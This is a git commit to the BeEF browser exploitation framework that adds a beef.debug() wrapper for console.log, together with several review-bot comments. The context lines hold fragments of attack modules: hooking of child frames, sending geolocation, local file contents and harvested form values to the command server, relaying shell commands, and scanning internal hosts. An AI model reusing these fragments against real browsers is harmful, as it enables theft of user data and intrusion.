Part of issue #862 - Add beef.debug() for client-side debugging

Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
bcoles
2013-04-15 16:49:01 +09:30
parent 55b0bee9ca
commit a172362452
18 changed files with 112 additions and 46 deletions


@@ -31,7 +31,20 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.
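Review bot: `debug: function(msg)` forwards only its first argument, whereas `console.log()` is variadic; the printf-style calls renamed in the geolocation section (`"... latitude [%d], longitude [%d]", latitude, longitude`, currently commented out) would lose their values if re-enabled. Forwarding every argument keeps the wrapper a drop-in replacement: `console.log.apply(console, arguments);`. The doc comment also says "the debug string to return", but nothing is returned; `@param {string} msg - message written to the browser console` would match the code. The enclosing `beef` object starts and ends outside this hunk.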


@@ -871,10 +871,10 @@ beef.browser = {
try {
// append hook script
self.frames[i].document.body.appendChild(script);
//console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
//beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
} catch (e) {
// warn on cross-domain
//console.log("Hooking frame failed");
//beef.debug("Hooking frame failed");
}
}
},


@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
//beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
//beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
//beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
//beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
//beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:


@@ -32,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
@@ -47,7 +47,7 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}


@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
//beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }


@@ -105,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},
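Review bot: The IE6–IE8 test in `printDebug` now overlaps with the capability check that `beef.debug()` performs itself (`typeof console.log == "function"`), so the condition can probably shrink to `if (this.debug) {`. Two different guards for the same concern tend to drift apart; if the browser test is kept deliberately, a short comment saying why would help. The comment above the function ("...and the browser is not IE") should be updated to match whichever form is chosen.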


@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
id = data.id;
},
error: function(){
console.log("Error getting module id.");
beef.debug("Error getting module id.");
}
});
return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
async: false,
processData: false,
success: function(data){
console.log("data: " + data.command_id);
beef.debug("data: " + data.command_id);
result = "Command [" + data.command_id + "] sent successfully";
},
error: function(){
console.log("Error sending command");
beef.debug("Error sending command");
return "Error sending command";
}
});
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
processData: false,
success: function(data){
$jwterm.each(data, function(i){
console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
results += $jwterm.parseJSON(data[i].data).data;
});
},
error: function(){
console.log("Error sending command");
beef.debug("Error sending command");
return "Error sending command";
}
});
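Review bot: `beef.debug()` lives on the hook's `beef` object, while `ZombieTab_IpecTab` looks like admin-panel UI code (it uses `$jwterm` rather than the hook's `$j`), so it is worth confirming that `beef` is actually in scope on that page. If it is not, every one of these calls throws a ReferenceError inside the ajax callback, where the old `console.log()` only logged. A guarded call such as `if (typeof beef !== 'undefined') beef.debug("Error sending command");`, or keeping `console.log` in this file, avoids that. The function body starts and ends outside these hunks.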


@@ -0,0 +1,17 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
try {
var msg = "<%= @msg.gsub(/"/, '\\"') %>";
beef.debug(msg);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
}
});
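Review bot: The `var msg = "<%= @msg.gsub(/"/, '\\"') %>";` line escapes only double quotes, so a backslash or a line break in the message (the option is declared as a `textarea`) yields a malformed or altered string literal. Because that is a parse error in the generated script, the surrounding `try`/`catch` never runs and no failure is reported back. Encoding the whole value is more robust than escaping one character: if the JSON library is available in the template context, `var msg = <%= @msg.to_json %>;` emits a correctly quoted literal.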


@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_beef_debug:
enable: true
category: "Debug"
name: "Test beef.debug()"
description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
authors: ["bcoles"]
target:
working: ["All"]
not_working: ["IE"]


@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_beef_debug < BeEF::Core::Command
def self.options
return [
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end


@@ -31,15 +31,15 @@ beef.execute(function () {
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
var result = strip_output(xhr.responseText);
console.log("result.length: " + result.length);
beef.debug("result.length: " + result.length);
if(result.length != 0){
console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
counter++;
setTimeout("get_additional_cmd_results()",500);
}
}else{ // No more command results, ready to send another command.
console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
}
};
xhr.open("GET", uri, false);
@@ -51,9 +51,9 @@ beef.execute(function () {
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
console.log("get_prompt: Retrieved prompt");
beef.debug("get_prompt: Retrieved prompt");
var prompt = strip_output(xhr.responseText);
console.log(prompt);
beef.debug(prompt);
beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
//send command
@@ -68,7 +68,7 @@ beef.execute(function () {
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
var cmd_result = strip_output(xhr.responseText);
console.log(cmd_result);
beef.debug(cmd_result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
};
xhr.open("POST", uri, false);


@@ -295,7 +295,7 @@ beef.execute(function () {
// this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
log("send_stager: stager sent.");
stager_successfull = true;
}catch(exception){
console.log("!!! Exception: " + exception);
beef.debug("!!! Exception: " + exception);
// Check for PortBanning exceptions:
//NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
var uri = "http://" + rhost + ":" + rport + path;
xhr = new XMLHttpRequest();
console.log("uri: " + uri);
beef.debug("uri: " + uri);
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
// this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
log = function(data){
beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
console.log(data);
beef.debug(data);
};


@@ -219,9 +219,9 @@ result = '';
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
console.log('dir = ' + dir);
console.log('fileList: ' + fileList[os]['post'][i]);
console.log(i);
beef.debug('dir = ' + dir);
beef.debug('fileList: ' + fileList[os]['post'][i]);
beef.debug(i);
tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
@@ -229,7 +229,7 @@ result = '';
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){
if(tmpfile[j].readyState==4){
console.log('new returned for: ' + j);
beef.debug('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);


@@ -219,7 +219,7 @@ beef.execute(function() {
for(var u=0; u < urls.length; u++) {
if(!urls[u][3] && ports != null){ // use default port
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
//beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
} else { // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
//beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }


@@ -27,7 +27,7 @@ beef.execute(function() {
// onError Callback receives a PositionError object
//
function onError(error) {
console.log('code: ' + error.code + '\n' +
beef.debug('code: ' + error.code + '\n' +
'message: ' + error.message + '\n');
}


@@ -26,12 +26,12 @@ beef.execute(function() {
function write_file(text) {
function fail () {
console.log('write_file fail')
beef.debug('write_file fail')
}
function gotFileWriter(writer) {
writer.onwrite = function(evt) {
console.log("write success");
beef.debug("write success");
}
writer.write(text);
}
@@ -59,14 +59,14 @@ beef.execute(function() {
function read_index(app_name) {
function fail () {
console.log('read_index fail')
beef.debug('read_index fail')
}
function readFile(file) {
var reader = new FileReader();
reader.onloadend = function(evt) {
//console.log("Read as text");
console.log(evt.target.result);
//beef.debug("Read as text");
beef.debug(evt.target.result);
replace_text(evt.target.result);
};
reader.readAsText(file);
@@ -86,14 +86,14 @@ beef.execute(function() {
function locate() {
function result(entries) {
console.log('result');
beef.debug('result');
var i;
for (i=0; i<entries.length; i++) {
// looking for <something>.app
var re = new RegExp(/^[a-zA-Z0-9]*\.app/)
var match = re.exec(entries[i].name)
if (match) {
console.log('found ' + entries[i].name);
beef.debug('found ' + entries[i].name);
// look for ../<something>.app/www/index.html
read_index(entries[i].name);
@@ -107,11 +107,11 @@ beef.execute(function() {
function fail() {
console.log('fail');
beef.debug('fail');
}
function win(entries) {
console.log('win');
beef.debug('win');
result(entries);
}


@@ -44,7 +44,7 @@ beef.execute(function() {
var val = JSON.stringify({'input':n,'value':v});
if (v != "" && !inArray(val,results)){
results.push(val);
//console.log(val);
//beef.debug(val);
beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
}
}


@@ -291,7 +291,7 @@ Clippy.prototype.findHomeBase = function(selector) {
}
console.log(ref);
beef.debug(ref);
return ref;
}